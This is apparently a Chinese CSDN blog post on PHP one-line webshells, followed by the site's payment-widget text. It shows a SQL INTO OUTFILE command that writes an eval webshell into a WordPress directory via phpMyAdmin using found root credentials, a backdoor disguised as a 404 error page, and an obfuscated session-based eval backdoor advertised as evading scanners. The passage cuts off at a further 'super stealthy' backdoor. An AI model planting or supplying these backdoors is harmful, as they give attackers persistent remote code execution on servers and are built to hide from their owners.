php中fputs写入一句话,phpmyadmin写入一句话木马的测试

本文介绍了多种PHP一句话木马的测试方法,包括通过fputs写入和phpmyadmin导出,以及如何利用404页面和无特征码进行隐藏。还探讨了超级隐蔽的PHP后门和层级请求运行的后门技术,提醒开发者注意防范。
摘要由CSDN通过智能技术生成

方法一,一句话木马

偶尔拿到一个config中,发现是root,且还有phpmyadmin。好吧,试试select'<?php  @eval($_POST[-77]);?>'INTO OUTFILE 'E:\Web\wp-content\errors.php'

提示成功了,可是构造地址访问,提示404,看来没成功,应该是转义的问题

接着尝试:select'<?php  @eval($_POST[-77]);?>'INTO OUTFILE 'E:\\Web\\xxx.xx.vn\\wp-content\\errors.php'

再次导入,提示成功,访问后发现真的成功了。

另一种一句话木马

服务器上发现被植了很多木马,而且还让人肆意使用...NND<?php  @eval($_POST['c']);?>

使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行

利用404页面隐藏PHP小马:HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

404 Not Found

Not Found

The requested URL was not found on this server.

@preg_replace("/[pageerror]/e",$_POST['error'],"saft");

header('HTTP/1.1 404 Not Found');

?>

404页面是网站常用的文件,一般建议好后很少有人会去对它进行检查修改,这时我们可以利用这一点进行隐藏后门。

无特征隐藏PHP一句话:<?php

session_start();

$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);

$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');

将$_POST['code']的内容赋值给$_SESSION['theCode'],然后执行$_SESSION['theCode'],亮点是没有特征码。用扫描工具来检查代码的话,是不会报警的,达到目的了。

超级隐蔽的PHP后门:

仅用GET函数就构成了木马;

利用方法:

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值